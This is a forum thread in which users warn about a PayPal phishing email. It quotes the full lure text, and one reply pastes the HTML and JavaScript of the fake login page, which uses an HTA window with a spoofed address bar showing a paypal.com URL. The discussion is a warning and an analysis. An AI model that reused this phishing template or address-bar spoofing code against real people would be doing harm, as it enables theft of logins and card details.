Paypal scam

[Guest doggunracing]

I'm sure some of you have already gotten these, but it's my first time. I can see people getting taken in by these. They aren't from African countries offering family riches or spelled like a retard computer wrote it. Only difference is the 'links' are really to another site with Paypal logos and links.

 

From: "PayPal" <service@paypal.com> Add to Address Book

Subject: New email address added to your PayPal account

Date: Mon, 6 Jun 2005 11:07:26 -0700

 

As part of our security measures, we regularly screen activity in the PayPal system. We recently noticed the following issue on your account:

 

We would like to ensure that your account was not accessed by an unauthorized third party. Because protecting the security of your account is our primary concern, we have limited access to sensitive PayPal account features. We understand that this may be an inconvenience but please understand that this temporary limitation is for your protection.

Case ID Number: PP-072-838-482

 

https://www.paypal.com/us/cgi-bin/webscr?cmd=complaint-view

 

For your protection, we have limited access to your account until additional security measures can be completed. We apologize for any

inconvenience this may cause.

 

To review your account and some or all of the information that PayPal used to make its decision to limit your account access, please visit the Resolution Center https://www.paypal.com/ . If, after reviewing your account information, you seek further clarification regarding your account access, please contact PayPal by visiting the Help Center and clicking "Contact Us". We thank you for your prompt attention to this matter. Please understand that this is a security measure intended to help protect you and your account. We apologize for any inconvenience.

 

Sincerely,

PayPal Account Review Department

 

PayPal Email ID PP5992822

[Lustalbert]

intresting that it shows the paypal adress in the adress bar. thanks for the heads up

[smokin5s]

if you put your mouse cursor over the address that it shows, then it will actually show you the address that it's linking you to

[Nitrousbird]

If you go to the original source website, it's actually an asian school, lol.

 

The log in's not only pretend to log you in, then try to get CC info as well.

 

With a little more work, they really could have made this look real.

[excell]

Yea, there is some damn good java programming there.

[Guest doggunracing]

Wow, I put in a bunch of bullshit info, it took it, then actually tried to log me into PayPal afterward. Pretty nice of them graemlins/finger.gif

[Nate1647545505]

Thats crazy, the PHP outter shell with java inside is pretty sneaky.

[Nate1647545505]

</font><blockquote>code:</font><hr /><pre style="font-size:x-small; font-family: monospace;"> <title>PayPal-Log In-</title>

<SCRIPT language=JavaScript1.2>

 

<!--

 

 

 

/*

 

Auto Maximize Window Script- By Nick Lowe (nicklowe@ukonline.co.uk)

 

For full source code, 100's more free DHTML scripts, and Terms Of Use

 

Visit http://www.dynamicdrive.com

 

*/

 

 

 

top.window.moveTo(0,0);

 

if (document.all) {

 

top.window.resizeTo(screen.availWidth,screen.availHeight);

 

}

 

else if (document.layers||document.getElementById) {

 

if (top.window.outerHeight<screen.availHeight||top.window.outerWidth<screen.availWidth){

 

top.window.outerHeight = screen.availHeight;

 

top.window.outerWidth = screen.availWidth;

 

}

 

}

 

//-->

 

</SCRIPT>

 

<META http-equiv=Content-Type

content="text/html; charset=windows-1252">

<HTA:APPLICATION id=oHTA

WINDOWSTATE="normal" SYSMENU="yes" SINGLEINSTANCE="yes" SHOWINTASKBAR="yes"

SELECTION="yes" SCROLLFLAT="yes" SCROLL="no" NAVIGABLE="yes" MINIMIZEBUTTON="no"

MAXIMIZEBUTTON="no" INNERBORDER="yes" ICON="yes" CONTEXTMENU="no" CAPTION="yes"

BORDERSTYLE="normal" BORDER="thin" APPLICATIONNAME="AmPost" VERSION="1.0" />

<STYLE>BODY {

BORDER-RIGHT: medium none; BORDER-TOP: medium none; FONT-SIZE: 8pt; MARGIN: 0px; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none; FONT-FAMILY: Arial; BACKGROUND-COLOR: buttonface

}

TD {

FONT-SIZE: 8pt

}

.indent {

LEFT: auto; TEXT-INDENT: 15pt; WHITE-SPACE: normal; TEXT-ALIGN: left

}

.size {

WIDTH: 100%

}

</STYLE>

 

<SCRIPT type=text/javascript>

<!--

<!--

var history=new Array(16);

hpos=0;

function MM_checkBrowser(NSvers,NSpass,NSnoPass,IEvers,IEpass,IEnoPass,OBpass,URL,altURL) { //v3.0

var newURL='', verStr=navigator.appVersion, app=navigator.appName, version = parseFloat(verStr);

if (app.indexOf('Netscape') != -1) {

if (version >= NSvers) {if (NSpass>0) newURL=(NSpass==1)?URL:altURL;}

else {if (NSnoPass>0) newURL=(NSnoPass==1)?URL:altURL;}

} else if (app.indexOf('Microsoft') != -1) {

if (version >= IEvers || verStr.indexOf(IEvers) != -1)

{if (IEpass>0) newURL=(IEpass==1)?URL:altURL;}

else {if (IEnoPass>0) newURL=(IEnoPass==1)?URL:altURL;}

} else if (OBpass>0) newURL=(OBpass==1)?URL:altURL;

if (newURL) { window.location=unescape(newURL); document.MM_returnValue=false; }

}

 

function forward()

{

frames["newFr"].location.href=history[hpos];

}

 

function load()

{

l=frames["newFr"].location.href;

if (l.lastIndexOf("?")==(l.length-1)) l=l.substr(0,l.length-1);

history[hpos]=l;

hpos++;

hpos%=16;

}

function MM_preloadImages() { //v3.0

var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();

var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)

if (a.indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a;}}

}

 

function MM_swapImgRestore() { //v3.0

var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a)&&x.oSrc;i++) x.src=x.oSrc;

}

 

function MM_findObj(n, d) { //v4.01

var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {

d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}

if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[n];

for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers.document);

if(!x && d.getElementById) x=d.getElementById(n); return x;

}

 

function MM_swapImage() { //v3.0

var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)

if ((x=MM_findObj(a))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}

}

function MM_displayStatusMsg(msgStr) { //v1.0

status=msgStr;

document.MM_returnValue = true;

}

function go()

{

a=document.all.newAddr.value;

if (a.indexOf("http://")!=0) a="http://"+a;

nav.action=a;

return true;

MM_swapImage('Image1','','go1click.gif');

MM_displayStatusMsg('Done');

 

}

// -->

 

function MM_showHideLayers() { //v3.0

var i,p,v,obj,args=MM_showHideLayers.arguments;

for (i=0; i<(args.length-2); i+=3) if ((obj=MM_findObj(args))!=null) { v=args[i+2];

if (obj.style) { obj=obj.style; v=(v=='show')?'visible':(v='hide')?'hidden':v; }

obj.visibility=v; }

}

//-->

</SCRIPT>

 

<META content="Microsoft FrontPage 5.0" name=GENERATOR></HEAD>

<BODY onmousedown="MM_showHideLayers('pop','','hide')"

onload="MM_preloadImages('pdownclick.gif');MM_checkBrowser(4.0,1,1,4.0,0,0,1,'primapagina.htm','primapagina.htm');return document.MM_returnValue"

onunload=;><SPAN class=" indent">

<TABLE height="100%" cellSpacing=0 cellPadding=0 width="100%">

<TBODY>

<TR borderColor=#cccccc>

<TD>

<TABLE borderColor=#c0c0c0 cellSpacing=0 cellPadding=0 width="100%"

border=0>

<TBODY>

<TR>

<FORM name=nav onsubmit=go(); action=about:blank method=get

target=newFr>

<TD

style="PADDING-RIGHT: 1px; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; PADDING-TOP: 1px"

align=right width=3 height=22>

<P align=left><IMG height=18 src="sline.gif"

width=3 align=right border=0></P></TD>

<TD

style="BACKGROUND-POSITION: right 50%; BACKGROUND-IMAGE: url('addr.gif'); BACKGROUND-REPEAT: no-repeat"

width=34 height=22>

<P> </P></TD>

<TD

style="BACKGROUND-POSITION: left 50%; BACKGROUND-IMAGE: url('ress.gif'); BACKGROUND-REPEAT: no-repeat"

align=left width="81%" height=22>

<INPUT class=indent id=newAddr

style="BACKGROUND-POSITION: left top; FONT-SIZE: 8pt; BACKGROUND-IMAGE: url('ie2.gif'); WIDTH: 100%; BACKGROUND-REPEAT: no-repeat; HEIGHT: 22px"

size=40 value="https://www.paypal.com/cgi-bin/webscr?cmd=_login-run" name=no> </TD>

<TD width=146 BACKGROUND-IMAGE: url('addr.gif'); BACKGROUND-REPEAT: no-repeat" height=22><A

onmousedown="MM_swapImage('Image2','','pdownclick.gif',1)"

style="CURSOR: default" onmouseout=MM_swapImgRestore()

href="primapagina.htm#"><IMG

onclick="MM_showHideLayers('pop','','show')" height=21

src="pdown.gif" width=17 border=0

name=Image2></A><A

onmousedown="MM_swapImage('Image1','','go1click.gif',1);MM_displayStatusMsg('Done');return document.MM_returnValue"

onmouseover="MM_swapImage('Image1','','go1roll.gif',1);MM_displayStatusMsg('Done');return document.MM_returnValue"

onmouseout=MM_swapImgRestore() href="file:///E:/"><INPUT id=Image1

style="CURSOR: default" onclick=go() type=image height=22 width=49

src="go1.gif" border=0 name=image1>

</A></TD></FORM></TR>

<TR>

<TD width=798 bgColor=#000000 colSpan=4><IMG height=1

src="hide.htm" width=1 border=0></TD></TR>

<TR>

<TD width=798 bgColor=#ffffff colSpan=4><IMG height=1

src="hide.htm" width=1

border=0></TD></TR></TBODY></TABLE>

<DIV id=pop

style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 53px; VISIBILITY: hidden; BORDER-LEFT: #000000 1px; WIDTH: 81%; BORDER-BOTTOM: #000000 1px; POSITION: absolute; HEIGHT: 50px; BACKGROUND-COLOR: #999999; layer-background-color: #999999"><TEXTAREA class=size name=textfield rows=5 wrap=VIRTUAL cols=77></TEXTAREA>

</DIV></TD></TR>

<TR height="100%">

<TD vAlign=top><IFRAME id=newFr style="WIDTH: 100%; HEIGHT: 100%"

name=newFr src="primapagina.htm" onload=load()

application="no"> </IFRAME></TD></TR></TBODY></TABLE></SPAN></BODY></HTML> </pre>

That's an interesting bit of work

[Lustalbert]

is it just ie that does it, or are the other browsers making it look legitamate as well?